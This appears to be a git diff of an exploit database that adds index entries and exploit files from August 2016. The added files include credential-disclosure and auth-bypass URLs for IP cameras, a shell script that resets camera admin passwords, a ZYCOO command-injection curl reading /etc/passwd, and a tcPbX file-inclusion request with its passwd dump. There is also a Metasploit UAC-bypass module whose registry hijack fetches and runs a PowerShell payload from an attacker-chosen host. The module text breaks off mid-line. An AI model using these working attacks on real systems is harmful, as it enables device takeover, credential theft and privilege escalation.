(gettext.php) 1.0.12 - Unauthenticated Code Execution",2016-07-25,kmkz,php,webapps,0 +40154,platforms/php/webapps/40154.txt,"PHP gettext 1.0.12 - (gettext.php) Unauthenticated Code Execution",2016-07-25,kmkz,php,webapps,0 40155,platforms/php/dos/40155.py,"PHP 7.0.8 / 5.6.23 / 5.5.37 - bzread() Out-of-Bounds Write",2016-07-25,"Hans Jerry Illikainen",php,dos,80 40156,platforms/cgi/webapps/40156.py,"Ubee EVW3226 Modem/Router 1.0.20 - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",cgi,webapps,80 40157,platforms/cgi/webapps/40157.py,"Technicolor TC7200 Modem/Router STD6.02.11 - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",cgi,webapps,80 @@ -36386,13 +36386,14 @@ id,file,description,date,author,platform,type,port 40234,platforms/windows/remote/40234.py,"Easy FTP Server 1.7.0.11 - 'APPE' Command Buffer Overflow Remote Exploit",2012-03-03,Swappage,windows,remote,0 40235,platforms/hardware/remote/40235.py,"Samsung Smart Home Camera SNH-P-6410 - Command Injection",2016-08-14,PentestPartners,hardware,remote,0 40236,platforms/ruby/webapps/40236.txt,"GitLab - 'impersonate' Feature Privilege Escalation",2016-08-15,Kaimi,ruby,webapps,80 +40262,platforms/cgi/webapps/40262.txt,"SIEMENS IP Cameras (Multiple Models) - Credential Disclosure / Configuration Download",2016-08-19,"Todor Donev",cgi,webapps,80 40237,platforms/php/webapps/40237.txt,"Zabbix 2.2.x / 3.0.x - SQL Injection",2016-08-15,1n3,php,webapps,0 40238,platforms/multiple/dos/40238.txt,"Microsoft Office Word 2013/2016 - sprmSdyaTop Denial of Service (MS16-099)",2016-08-16,COSIG,multiple,dos,0 40239,platforms/jsp/webapps/40239.txt,"WSO2 Identity Server 5.1.0 - Multiple Vulnerabilities",2016-08-16,hyp3rlinx,jsp,webapps,0 40240,platforms/jsp/webapps/40240.txt,"WSO2 Carbon 4.4.5 - Local File Inclusion",2016-08-16,hyp3rlinx,jsp,webapps,9443 40241,platforms/jsp/webapps/40241.txt,"WSO2 Carbon 4.4.5 - Stored XSS",2016-08-16,hyp3rlinx,jsp,webapps,9443 40242,platforms/jsp/webapps/40242.txt,"WSO2 Carbon 4.4.5 - (Denial of Service) CSRF",2016-08-16,hyp3rlinx,jsp,webapps,9443 -40243,platforms/osx/dos/40243.html,"Google Chrome 26.0.1410.43 (Webkit) - OBJECT Element Use After Free PoC",2013-04-04,"Google Security Research",osx,dos,0 +40243,platforms/osx/dos/40243.html,"Google Chrome 26.0.1410.43 (Webkit) - OBJECT Element Use-After-Free PoC",2013-04-04,"Google Security Research",osx,dos,0 40245,platforms/win_x86/shellcode/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 40246,platforms/win_x86/shellcode/40246.c,"Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 40247,platforms/php/webapps/40247.txt,"Lepton CMS 2.2.0 / 2.2.1 - Directory Traversal",2016-08-16,hyp3rlinx,php,webapps,80 @@ -36406,7 +36407,23 @@ id,file,description,date,author,platform,type,port 40255,platforms/windows/dos/40255.txt,"Microsoft GDI+ - DecodeCompressedRLEBitmap Invalid Pointer Arithmetic Out-of-Bounds Write (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0 40256,platforms/windows/dos/40256.txt,"Microsoft GDI+ - ValidateBitmapInfo Invalid Pointer Arithmetic Out-of-Bounds Reads (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0 40257,platforms/windows/dos/40257.txt,"Microsoft GDI+ - EMR_EXTTEXTOUTA and EMR_POLYTEXTOUTA Heap-Based Buffer Overflow (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0 -40258,platforms/hardware/remote/40258.txt,"Cisco ASA 8.x - Authentication Bypass (EXTRABACON)",2016-08-18,"Equation Group",hardware,remote,161 +40258,platforms/hardware/remote/40258.txt,"Cisco ASA 8.x - Authentication Bypass (EXTRABACON)",2016-08-18,"Shadow Brokers",hardware,remote,161 40259,platforms/win_x86/shellcode/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 40260,platforms/cgi/webapps/40260.sh,"SIEMENS IP Camera CCMW1025 x.2.2.1798 - Remote Admin Credentials Change",2016-08-18,"Todor Donev",cgi,webapps,80 40261,platforms/cgi/webapps/40261.txt,"Honeywell IP-Camera HICC-1100PT - Credentials Disclosure",2016-08-18,"Yakir Wizman",cgi,webapps,80 +40263,platforms/cgi/webapps/40263.txt,"Vanderbilt IP-Camera CCPW3025-IR_ CVMW3025-IR - Credentials Disclosure",2016-08-19,"Yakir Wizman",cgi,webapps,80 +40264,platforms/cgi/webapps/40264.txt,"JVC IP-Camera VN-T216VPRU - Credentials Disclosure",2016-08-19,"Yakir Wizman",cgi,webapps,80 +40265,platforms/cgi/webapps/40265.txt,"C2S DVR Management IRDOME-II-C2S_ IRBOX-II-C2S_ DVR - Credentials Disclosure / Authentication Bypass",2016-08-19,"Yakir Wizman",cgi,webapps,80 +40266,platforms/cgi/webapps/40266.txt,"TOSHIBA IP-Camera IK-WP41A - Auth Bypass / Configuration Download",2016-08-19,"Todor Donev",cgi,webapps,80 +40267,platforms/cgi/webapps/40267.txt,"MESSOA IP-Camera NIC990 - Auth Bypass / Configuration Download",2016-08-19,"Todor Donev",cgi,webapps,80 +40268,platforms/windows/local/40268.rb,"Windows - Fileless UAC Protection Bypass Privilege Escalation (Metasploit)",2016-08-19,"Pablo González",windows,local,0 +40269,platforms/cgi/webapps/40269.txt,"ZYCOO IP Phone System - Remote Command Execution",2016-08-19,0x4148,cgi,webapps,0 +40270,platforms/linux/local/40270.txt,"WatchGuard Firewalls - ifconfig Privilege Escalation (ESCALATEPLOWMAN)",2016-08-19,"Shadow Brokers",linux,local,0 +40271,platforms/hardware/local/40271.txt,"Cisco ASA / PIX - Privilege Escalation (EPICBANANA)",2016-08-19,"Shadow Brokers",hardware,local,0 +40272,platforms/cgi/webapps/40272.txt,"TOPSEC Firewalls - Remote Code Execution (ELIGIBLECONTESTANT)",2016-08-19,"Shadow Brokers",cgi,webapps,0 +40273,platforms/cgi/webapps/40273.txt,"TOPSEC Firewalls - Remote Code Execution (ELIGIBLECANDIDATE)",2016-08-19,"Shadow Brokers",cgi,webapps,0 +40274,platforms/cgi/webapps/40274.txt,"TOPSEC Firewalls - Remote Code Execution (ELIGIBLEBOMBSHELL)",2016-08-19,"Shadow Brokers",cgi,webapps,0 +40275,platforms/hardware/remote/40275.txt,"TOPSEC Firewalls - Remote Exploit (ELIGIBLEBACHELOR)",2016-08-19,"Shadow Brokers",hardware,remote,0 +40276,platforms/hardware/webapps/40276.txt,"Fortigate Firewalls - Remote Code Execution (EGREGIOUSBLUNDER)",2016-08-19,"Shadow Brokers",hardware,webapps,0 +40277,platforms/cgi/webapps/40277.sh,"MESSOA IP Cameras (Multiple Models) - Unauthenticated Password Change",2016-08-19,"Todor Donev",cgi,webapps,80 +40278,platforms/php/webapps/40278.txt,"tcPbX - (tcpbx_lang) Local File Inclusion",2016-08-19,0x4148,php,webapps,0 diff --git a/platforms/cgi/webapps/40262.txt b/platforms/cgi/webapps/40262.txt new file mode 100755 index 000000000..2ee0c8b89 --- /dev/null +++ b/platforms/cgi/webapps/40262.txt @@ -0,0 +1,42 @@ +# +# +# Multiple SIEMENS IP Cameras auth bypass configuration download +# +# Tested: +# SIEMENS IP Camera CCID1410-ST X.1.0.24 +# SIEMENS IP Camera CCMW1025 x.2.2.1798 +# SIEMENS IP Camera CCMS2025 x.2.2.1798 +# SIEMENS IP Camera CVMS2025-IR x.2.2.1798 +# SIEMENS IP Camera CVMS2025-IR CxMS2025_V2458 +# SIEMENS IP Camera CVMS2025-IR CxMS2025_V2458_SP1 +# SIEMENS IP Camera CCPW5025-IR CCPWx025_V0.1.58 +# +# ...and more, more devices who use same firmware +# +# Copyright 2016 (c) Todor Donev +# http://www.ethical-hacker.org/ +# https://www.facebook.com/ethicalhackerorg +# +# Disclaimer: +# This or previous programs is for Educational +# purpose ONLY. Do not use it without permission. +# The usual disclaimer applies, especially the +# fact that Todor Donev is not liable for any +# damages caused by direct or indirect use of the +# information or functionality provided by these +# programs. The author or any Internet provider +# bears NO responsibility for content or misuse +# of these programs or any derivatives thereof. +# By using these programs you accept the fact +# that any damage (dataloss, system crash, +# system compromise, etc.) caused by the use +# of these programs is not Todor Donev's +# responsibility. +# +# Use them at your own risk! +# +# + +http://TARGET/cgi-bin/chklogin.cgi?file=config.ini +http://TARGET/cgi-bin/check.cgi?file=ikwd03conf.ini + diff --git a/platforms/cgi/webapps/40263.txt b/platforms/cgi/webapps/40263.txt new file mode 100755 index 000000000..9aa2b2642 --- /dev/null +++ b/platforms/cgi/webapps/40263.txt @@ -0,0 +1,40 @@ +1. Advisory Information +======================================== +Title : Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR) Remote Credentials Disclosure +Vendor Homepage : https://is.spiap.com/ +Remotely Exploitable : Yes +Tested on Camera types : CCPW3025-IR , CVMW3025-IR +Product References : https://is.spiap.com/products/video/1_cameras/11_ip_camerars/bullet-kameror/v54561-c117-a100.html ++ : https://uk.spiap.com/products/video/1_cameras/11_ip_camerars/114_vandal_resistent_dome_cameras/cvmw3025-ir.html +Vulnerability : Username / Password Disclosure (Critical/High) +Shodan Dork : title:"Vanderbilt IP-Camera" +Date : 19/08/2016 +Author : Yakir Wizman (https://www.linkedin.com/in/yakirwizman) + + +2. CREDIT +======================================== +This vulnerability was identified during penetration test by Yakir Wizman. + + +3. Description +======================================== +Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR) allows to unauthenticated user disclose the username & password remotely by simple request which made by browser. + + +4. Proof-of-Concept: +======================================== +Simply go to the following url: +http://host:port/cgi-bin/readfile.cgi?query=ADMINID + +Should return some javascript variable which contain the credentials and other configuration vars: +var Adm_ID="admin"; var Adm_Pass1=“admin”; var Adm_Pass2=“admin”; var Language=“en”; var Logoff_Time="0"; + +----------------------------------------------- + +Login @ http://host:port/cgi-bin/chklogin.cgi + + +5. SOLUTION +======================================== +Contact the vendor for further information regarding the proper mitigation of this vulnerability. \ No newline at end of file diff --git a/platforms/cgi/webapps/40264.txt b/platforms/cgi/webapps/40264.txt new file mode 100755 index 000000000..65b527250 --- /dev/null +++ b/platforms/cgi/webapps/40264.txt @@ -0,0 +1,38 @@ +1. Advisory Information +======================================== +Title : JVC IP-Camera (VN-T216VPRU) Remote Credentials Disclosure +Vendor Homepage : http://pro.jvc.com/ +Remotely Exploitable : Yes +Tested on Camera types : VN-T216VPRU +Product References : http://pro.jvc.com/prof/attributes/features.jsp?model_id=MDL102145 +Vulnerability : Username / Password Disclosure (Critical/High) +Date : 19/08/2016 +Author : Yakir Wizman (https://www.linkedin.com/in/yakirwizman) + + +2. CREDIT +======================================== +This vulnerability was identified during penetration test by Yakir Wizman. + + +3. Description +======================================== +JVC IP-Camera (VN-T216VPRU) allows to unauthenticated user disclose the username & password remotely by simple request which made by browser. + + +4. Proof-of-Concept: +======================================== +Simply go to the following url: +http://host:port/cgi-bin/readfile.cgi?query=ADMINID + +Should return some javascript variable which contain the credentials and other configuration vars: +var Adm_ID="admin"; var Adm_Pass1=“admin”; var Adm_Pass2=“admin”; var Language=“en”; var Logoff_Time="0"; + +----------------------------------------------- + +Login @ http://host:port/cgi-bin/chklogin.cgi + + +5. SOLUTION +======================================== +Contact the vendor for further information regarding the proper mitigation of this vulnerability. \ No newline at end of file diff --git a/platforms/cgi/webapps/40265.txt b/platforms/cgi/webapps/40265.txt new file mode 100755 index 000000000..eebdc0cdb --- /dev/null +++ b/platforms/cgi/webapps/40265.txt @@ -0,0 +1,56 @@ +1. Advisory Information +======================================== +Title : C2S DVR Management Remote Credentials Disclosure & Authentication Bypass +Vendor Homepage : http://www.cash2s.com/en/ +Remotely Exploitable : Yes +Tested on Camera types : IRDOME-II-C2S, IRBOX-II-C2S, DVR +Vulnerabilities : Credentials Disclosure ++ : Authentication bypass +Date : 19/08/2016 +Shodan Dork : html:write.cgi "Content-length: 2676" +Author : Yakir Wizman (https://www.linkedin.com/in/yakirwizman) + + +2. CREDIT +======================================== +This vulnerability was identified during penetration test by Yakir Wizman. + + +3. Description +======================================== +C2S DVR allows to unauthenticated user disclose the username & password remotely by simple request to the server page 'read.cgi?page=2' which can be made by browser or burp/fiddler. +Moreover, an attacker could easily access to password change page without any authentication, thats happen cuase the web application does not perform any session management. + + +4. Proof-of-Concept: +======================================== +Remote Credentials Disclosure: +----------------------------------------------- +Simply go to the following url to read the credentials: +http://host:port/cgi-bin/read.cgi?page=2 + +Should return some javascript variable which contain the credentials and other configuration vars: + +var pw_enflag = "1"; +var pw_adminpw = "12345"; +var pw_retype1 = "12345"; +var pw_userpw = "56789"; +var pw_retype2 = "56789"; +var pw_autolock = "0"; + + +Login @ http://host:port/ +----------------------------------------------- + + +Authentication Bypass: +----------------------------------------------- +The application does not require a valid session for any page on the server, for example you can access to 'password.htm' which allows you to change/disclose the admin password with just a few clicks. + +http://host:port/password.htm?parm1=&parm2=1 + + + +5. SOLUTION +======================================== +Contact the vendor for further information regarding the proper mitigation of this vulnerability. \ No newline at end of file diff --git a/platforms/cgi/webapps/40266.txt b/platforms/cgi/webapps/40266.txt new file mode 100755 index 000000000..20194a3de --- /dev/null +++ b/platforms/cgi/webapps/40266.txt @@ -0,0 +1,30 @@ +# +# +# TOSHIBA IK-WP41A IP-Camera auth bypass configuration download +# +# Copyright 2016 (c) Todor Donev +# http://www.ethical-hacker.org/ +# https://www.facebook.com/ethicalhackerorg +# +# Disclaimer: +# This or previous programs is for Educational +# purpose ONLY. Do not use it without permission. +# The usual disclaimer applies, especially the +# fact that Todor Donev is not liable for any +# damages caused by direct or indirect use of the +# information or functionality provided by these +# programs. The author or any Internet provider +# bears NO responsibility for content or misuse +# of these programs or any derivatives thereof. +# By using these programs you accept the fact +# that any damage (dataloss, system crash, +# system compromise, etc.) caused by the use +# of these programs is not Todor Donev's +# responsibility. +# +# Use them at your own risk! +# +# + +http://TARGET/cgi-bin/chklogin.cgi?file=config.ini + diff --git a/platforms/cgi/webapps/40267.txt b/platforms/cgi/webapps/40267.txt new file mode 100755 index 000000000..4c7933cac --- /dev/null +++ b/platforms/cgi/webapps/40267.txt @@ -0,0 +1,30 @@ +# +# +# MESSOA NIC990 IP-Camera auth bypass configuration download +# +# Copyright 2016 (c) Todor Donev +# http://www.ethical-hacker.org/ +# https://www.facebook.com/ethicalhackerorg +# +# Disclaimer: +# This or previous programs is for Educational +# purpose ONLY. Do not use it without permission. +# The usual disclaimer applies, especially the +# fact that Todor Donev is not liable for any +# damages caused by direct or indirect use of the +# information or functionality provided by these +# programs. The author or any Internet provider +# bears NO responsibility for content or misuse +# of these programs or any derivatives thereof. +# By using these programs you accept the fact +# that any damage (dataloss, system crash, +# system compromise, etc.) caused by the use +# of these programs is not Todor Donev's +# responsibility. +# +# Use them at your own risk! +# +# + +http://TARGET/cgi-bin/chklogin.cgi?file=config.ini + diff --git a/platforms/cgi/webapps/40269.txt b/platforms/cgi/webapps/40269.txt new file mode 100755 index 000000000..cc0ea2086 --- /dev/null +++ b/platforms/cgi/webapps/40269.txt @@ -0,0 +1,61 @@ +Vulnerable hardware : ZYCOO IP phone system +Vendor : zycoo.com +Author : Ahmed sultan (@0x4148) +Email : 0x4148@gmail.com + +Summary : According to the vendor's site , +CooVox Series IP Phone System is the most innovative solution for VoIP telecommunication in SMB (Small and Medium-sized Business) market. +They provide not only traditional PBX functions such as automated attendant and voicemail, +but also offer many advance telephony features, including remote extensions, remote office connection, +IVR, call recording, call detail records(CDR)… + +Vulnerable file : /www/cgi-bin/system_cmd.cgi + +Code shot : + +#!/bin/hush +printf '\r\n' +if [ -n "$REQUEST_METHOD" ]; then + case "$REQUEST_METHOD" in + (GET) + if [ -n "$QUERY_STRING" ]; then + for args in `echo "$QUERY_STRING" | tr "&" " "` + do + param=`echo "$args" | cut -d "=" -f 1` + value=`echo "$args" | cut -d "=" -f 2` + eval "export $param=$value" + done + fi + ;; + esac +fi +INI_FILE=/etc/asterisk/manager.conf +INI_SECTION=$username +eval `sed -e 's/[[:space:]]*\=[[:space:]]*/=/g' \ + -e 's/;.*$//' \ + -e 's/[[:space:]]*$//' \ + -e 's/^[[:space:]]*//' \ + -e "s/^\(.*\)=\([^\"']*\)$/\1=\'\2\'/" \ + < $INI_FILE \ + | sed -n -e "/^\[$INI_SECTION\]/,/^\s*\[/{/^[^;].*\=.*/p;}"` +password="`/etc/scripts/decodeURI $password`" +[ -z "$secret" ] && secret=`/etc/scripts/getkeyvalue.sh ${INI_SECTION} vmsecret` +if [ "$password" = "$secret" ]; then + cmd=`echo $cmd | sed 's/%20/ /g'` +# cmd=`echo $cmd | sed -e's/%\([0-9A-F][0-9A-F]\)/\\\\\x\1/g;s/?r//g' | xargs echo` + $cmd + +the GET parameter cmd is freely available to directly execute system commands with no prior required authentication +which lead to full hardware takeover + +POC +[0x4148:/R1z]# curl http://server:9999/cgi-bin/system_cmd.cgi\?cmd\='cat%20/etc/passwd' +root:$1$C6ouMLFa$pb2/Bu1bcWpBNcX38jTva0:0:0:root:/:/bin/sh +nobody:x:99:99:Nobody:: + +Also by reading file /etc/asterisk/manager.conf +hardware admin's password can be obtained in plain text + +Fixing? +Unfortunately the hardware frontend really depend on this file , and the vendor is super lazy on replying on the emails regarding this vulnerability +so , best fixation for now is enabling the web interface browsing from the local network only diff --git a/platforms/cgi/webapps/40272.txt b/platforms/cgi/webapps/40272.txt new file mode 100755 index 000000000..61281db76 --- /dev/null +++ b/platforms/cgi/webapps/40272.txt @@ -0,0 +1,8 @@ +# Exploit Title: TOPSEC Firewalls - Remote Code Execution (ELIGIBLECONTESTANT) +# Date: 19-08-2016 +# Exploit Author: Shadow Brokers +# Vendor Homepage: http://www.topsec.com.cn/ + + +Full Exploit: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40272.zip \ No newline at end of file diff --git a/platforms/cgi/webapps/40273.txt b/platforms/cgi/webapps/40273.txt new file mode 100755 index 000000000..c065b1f33 --- /dev/null +++ b/platforms/cgi/webapps/40273.txt @@ -0,0 +1,8 @@ +# Exploit Title: TOPSEC Firewalls - Remote Code Execution (ELIGIBLECANDIDATE) +# Date: 19-08-2016 +# Exploit Author: Shadow Brokers +# Vendor Homepage: http://www.topsec.com.cn/ + + +Full Exploit: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40273.zip \ No newline at end of file diff --git a/platforms/cgi/webapps/40274.txt b/platforms/cgi/webapps/40274.txt new file mode 100755 index 000000000..0188cbb7d --- /dev/null +++ b/platforms/cgi/webapps/40274.txt @@ -0,0 +1,8 @@ +# Exploit Title: TOPSEC Firewalls - Remote Code Execution (ELIGIBLEBOMBSHELL) +# Date: 19-08-2016 +# Exploit Author: Shadow Brokers +# Vendor Homepage: http://www.topsec.com.cn/ + + +Full Exploit: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40274.zip \ No newline at end of file diff --git a/platforms/cgi/webapps/40277.sh b/platforms/cgi/webapps/40277.sh new file mode 100755 index 000000000..d7dce5440 --- /dev/null +++ b/platforms/cgi/webapps/40277.sh @@ -0,0 +1,52 @@ +# +# +# Multiple MESSOA IP-Cameras auth bypass admin user/password changer +# +# Tested: +# MESSOA NIC 835 Release: X.2.1.8 +# MESSOA NIC 835-HN5 Release: X.2.1.17 +# MESSOA NIC 836 Release: X.2.1.7 +# MESSOA NDZ 860 Release: X.3.0.6.1 +# MESSOA +# +# Copyright 2016 (c) Todor Donev +# +# http://www.ethical-hacker.org/ +# https://www.facebook.com/ethicalhackerorg +# +# Disclaimer: +# This or previous programs is for Educational +# purpose ONLY. Do not use it without permission. +# The usual disclaimer applies, especially the +# fact that Todor Donev is not liable for any +# damages caused by direct or indirect use of the +# information or functionality provided by these +# programs. The author or any Internet provider +# bears NO responsibility for content or misuse +# of these programs or any derivatives thereof. +# By using these programs you accept the fact +# that any damage (dataloss, system crash, +# system compromise, etc.) caused by the use +# of these programs is not Todor Donev's +# responsibility. +# +# Use them at your own risk! +# + +if [[ $# -gt 3 || $# -lt 2 ]]; then + echo " [ MESSOA IP-Cameras auth bypass admin user/password changer" + echo " [ ===" + echo " [ Usage: $0 " + echo " [ Example: $0 192.168.1.200:80 hacker teflon" + echo " [ ===" + echo " [ Copyright 2016 (c) Todor Donev " + echo " [ Website: http://www.ethical-hacker.org/" + echo " [ Facebook: https://www.facebook.com/ethicalhackerorg " + exit; +fi +GET=`which GET 2>/dev/null` +if [ $? -ne 0 ]; then + echo " [ Error : libwww-perl not found =/" + exit; +fi + GET "http://$1/cgi-bin/writefile.cgi?DEFonoff_adm=&Adm_ID=$2&Adm_Pass1=$3&Adm_Pass2=$3&UpSectionName=ADMINID" 0&> /dev/null <&1 diff --git a/platforms/hardware/local/40271.txt b/platforms/hardware/local/40271.txt new file mode 100755 index 000000000..91d6e1af9 --- /dev/null +++ b/platforms/hardware/local/40271.txt @@ -0,0 +1,8 @@ +# Exploit Title: Cisco ASA / PIX - Privilege Escalation (EPICBANANA) +# Date: 19-08-2016 +# Exploit Author: Shadow Brokers +# Vendor Homepage: http://www.cisco.com/ + + +Full Exploit: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40271.zip \ No newline at end of file diff --git a/platforms/hardware/remote/40275.txt b/platforms/hardware/remote/40275.txt new file mode 100755 index 000000000..d51bb40c0 --- /dev/null +++ b/platforms/hardware/remote/40275.txt @@ -0,0 +1,8 @@ +# Exploit Title: TOPSEC Firewalls - Remote Exploit (ELIGIBLEBACHELOR) +# Date: 19-08-2016 +# Exploit Author: Shadow Brokers +# Vendor Homepage: http://www.topsec.com.cn/ + + +Full Exploit: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40275.zip \ No newline at end of file diff --git a/platforms/hardware/webapps/40276.txt b/platforms/hardware/webapps/40276.txt new file mode 100755 index 000000000..460af5f5e --- /dev/null +++ b/platforms/hardware/webapps/40276.txt @@ -0,0 +1,8 @@ +# Exploit Title: Fortigate Firewalls - Remote Code Execution (EGREGIOUSBLUNDER) +# Date: 19-08-2016 +# Exploit Author: Shadow Brokers +# Vendor Homepage: https://www.fortinet.com/products/fortigate/ + + +Full Exploit: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40276.zip \ No newline at end of file diff --git a/platforms/linux/local/40270.txt b/platforms/linux/local/40270.txt new file mode 100755 index 000000000..f1a8009d5 --- /dev/null +++ b/platforms/linux/local/40270.txt @@ -0,0 +1,8 @@ +# Exploit Title: WatchGuard Firewalls - ifconfig Privilege Escalation (ESCALATEPLOWMAN) +# Date: 19-08-2016 +# Exploit Author: Shadow Brokers +# Vendor Homepage: http://www.watchguard.com/ + + +Full Exploit: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40270.zip \ No newline at end of file diff --git a/platforms/php/webapps/40278.txt b/platforms/php/webapps/40278.txt new file mode 100755 index 000000000..3e8ae05ca --- /dev/null +++ b/platforms/php/webapps/40278.txt @@ -0,0 +1,66 @@ +Vulnerable hardware : tcpbx voip distro +Vendor : www.tcpbx.org +Author : Ahmed sultan (@0x4148) +Email : 0x4148@gmail.com + +Summary : According to the vendor's site , +tcPbX is a complete and functional VoIP phone system based on Asterisk open +source software and CentOS operating system. +The simplified installation and the new administration portal allow you to +have a full featured phone system in less than an hour without specific +skills on linux or asterisk + +Vulnerable file : /var/www/html/tcpbx/index.php +The software suffer from LFI flaw because of the tcpbx_lang parameter isn't +sanitized before being proceeded in the file + +Request +GET /tcpbx/ HTTP/1.1 +Host: server +User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:47.0) +Gecko/20100101 Firefox/47.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: tcpbx_lang=../../../../../../../../../../etc/passwd%00; +PHPSESSID=cupsei1iqmv2bqa81pkcvg4jg1 +Connection: close +Cache-Control: max-age=0 +----------------------------------- +Response +HTTP/1.1 200 OK +Date: Fri, 19 Aug 2016 15:45:30 GMT +Server: Apache/2.2.15 (CentOS) +X-Powered-By: PHP/5.3.3 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, +pre-check=0 +Pragma: no-cache +Connection: close +Content-Type: text/html; charset=UTF-8 +Content-Length: 23874 + +root:x:0:0:root:/root:/bin/bash +bin:x:1:1:bin:/bin:/sbin/nologin +daemon:x:2:2:daemon:/sbin:/sbin/nologin +adm:x:3:4:adm:/var/adm:/sbin/nologin +lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin +sync:x:5:0:sync:/sbin:/bin/sync +shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +mail:x:8:12:mail:/var/spool/mail:/sbin/nologin +uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin +operator:x:11:0:operator:/root:/sbin/nologin +games:x:12:100:games:/usr/games:/sbin/nologin +gopher:x:13:30:gopher:/var/gopher:/sbin/nologin +ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin +nobody:x:99:99:Nobody:/:/sbin/nologin +vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin +sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin +ntp:x:38:38::/etc/ntp:/sbin/nologin +saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin +mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin +smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin +apache:x:48:48:Apache:/var/www:/sbin/nologin +mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash +postfix:x:89:89::/var/spool/postfix:/sbin/nologin diff --git a/platforms/windows/local/40268.rb b/platforms/windows/local/40268.rb new file mode 100755 index 000000000..12bd40b2f --- /dev/null +++ b/platforms/windows/local/40268.rb @@ -0,0 +1,137 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Local + Rank = ExcellentRanking + + include Exploit::EXE + include Post::File + include Post::Windows::Priv + include Post::Windows::Runas + include Post::Windows::Registry + include Post::Windows::Powershell + + + def initialize(info={}) + super( update_info(info, + 'Name' => 'Windows Escalate UAC Protection Bypass with Fileless', + 'Description' => %q{ + This module will bypass Windows UAC by utilizing eventvwr.exe and hijacking entries registry on Windows. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Matt Graeber', + 'Enigma0x3', + 'Pablo Gonzalez' # Port to local exploit + ], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ], + 'Targets' => [ + [ 'Windows x86', { 'Arch' => ARCH_X86 } ], + [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] + ], + 'DefaultTarget' => 0, + 'References' => [ + [ 'URL', 'https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/' ],['URL','http://www.elladodelmal.com/2016/08/como-ownear-windows-7-y-windows-10-con.html'], + ], + 'DisclosureDate'=> "Aug 15 2016" + )) + + register_options([ + OptString.new('FILE_DYNAMIC_PAYLOAD',[true,'Payload PSH Encoded will be generated here (Not include webserver path)']), + OptString.new('IPHOST',[true,'IP WebServer where File Payload will be downloaded']), + OptBool.new('LOCAL',[true,'File Payload is in this machine?',true] ), + ]) + + end + + def check_permissions! + # Check if you are an admin + vprint_status('Checking admin status...') + admin_group = is_in_admin_group? + + if admin_group.nil? + print_error('Either whoami is not there or failed to execute') + print_error('Continuing under assumption you already checked...') + else + if admin_group + print_good('Part of Administrators group! Continuing...') + else + fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') + end + end + + if get_integrity_level == INTEGRITY_LEVEL_SID[:low] + fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level') + end + end + + def exploit + validate_environment! + + case get_uac_level + when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT + fail_with(Failure::NotVulnerable, + "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..." + ) + when UAC_DEFAULT + print_good 'UAC is set to Default' + print_good 'BypassUAC can bypass this setting, continuing...' + when UAC_NO_PROMPT + print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead" + runas_method + return + end + + keys = registry_enumkeys('HKCU\Software\Classes\mscfile\shell\open\command') + + if keys == nil + print_good("HKCU\\Software\\Classes\\mscfile\\shell\\open\\command not exist!") + end + + key = registry_createkey('HKCU\Software\Classes\mscfile\shell\open\command') + reg = "IEX (New-Object Net.WebClient).DownloadString(\'http://#{datastore['IPHOST']}/#{datastore['FILE_DYNAMIC_PAYLOAD']}\')" + + command = cmd_psh_payload(payload.encoded, 'x86',{:remove_comspec => true,:encode_final_payload => true}) + if datastore['LOCAL'] + if File.exists?("/var/www/html/#{datastore['FILE_DYNAMIC_PAYLOAD']}") + File.delete("/var/www/html/#{datastore['FILE_DYNAMIC_PAYLOAD']}") + end + file_local_write("/var/www/html/#{datastore['FILE_DYNAMIC_PAYLOAD']}",command) + end + + result = 